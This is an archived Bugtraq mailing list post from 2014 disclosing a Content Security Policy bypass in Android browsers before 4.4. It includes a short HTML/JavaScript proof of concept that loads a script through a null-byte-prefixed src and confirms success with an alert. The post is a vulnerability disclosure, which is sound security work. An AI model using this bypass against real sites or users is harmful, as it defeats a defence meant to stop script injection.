lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Message-Id: <201410101545.s9AFjAUA011144@sf01web3.securityfocus.com>
Date: Fri, 10 Oct 2014 15:45:10 GMT
From: evanjjohns@...il.com
To: bugtraq@...urityfocus.com
Subject: CSP Bypass in android browser prior to 4.4

Hello. I hope this is the correct place to report this bug.

I've found a Content Security Policy bypass similar to the same and related to the same origin policy bypass in this CVE. This is a separate vulnerability, however.
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6041

I've tested this on an Android 4.3 tablet. I've tested this and it works on Firefox (32.0.2), InBrowser, Dolphin (App info doesn't give version). I also tested the default android browser on 4.3.1 emulator which was also vulnerable.

PoC:
<input type=button value="test" onclick="
  a=document.createElement('script');
  a.id='AA';
  a.src='\u0000https://js.stripe.com/v2/';
  document.body.appendChild(a);
  setTimeout(function(){if(typeof(document.getElementById('AA'))!=='undefined'){alert(Stripe);}else{ alert(2);}}, 400);
  return false;">

The content security policy rule that should block this is 
script-src 'self' https://js.stripe.com/v2/ ;

The PoC worked if you see a popup containing stripes e(){} object. You can test this on http://ejj.io/test.php


Cheers,
Evan J

Powered by blists - more mailing lists